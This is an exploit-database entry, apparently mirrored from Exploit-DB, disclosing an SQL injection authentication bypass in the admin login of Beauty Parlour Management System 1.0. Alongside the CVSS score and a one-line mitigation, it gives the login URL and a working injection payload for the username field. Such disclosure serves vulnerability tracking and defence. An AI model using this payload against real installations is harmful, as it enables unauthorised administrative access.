header-logo
Suggest Exploit
vendor:
Beauty Parlour Management System
by:
Prof. Kailas PATIL (krp)
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Beauty Parlour Management System
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:phpgurukul:beauty_parlour_management_system
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: LAMP for Linux
2020

Beauty Parlour Management System 1.0 – Authentication Bypass

Password and username parameters have sql injection vulnerability in Admin login panel.

Mitigation:

Input validation and sanitization should be done to prevent SQL injection attacks.
Source

Exploit-DB raw data:

# Exploit Title: Beauty Parlour Management System 1.0 - Authentication Bypass
# Google Dork: N/A
# Exploit Author: Prof. Kailas PATIL  (krp)
# Date: 2020-06-18
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/beauty-parlour-management-system-using-php-and-mysql/
# Version: v1.0
# Category: Webapps
# Tested on: LAMP for Linux

# Description:
# Password and username parameters have sql injection vulnerability in Admin login panel.
# 
#------------------------------------------------------
# 
# Login Link:  http://localhost/bpms/admin/index.php
# 	username: ' or '1'='1'#  
#	password: blah123
# 
#------------------------------------------------------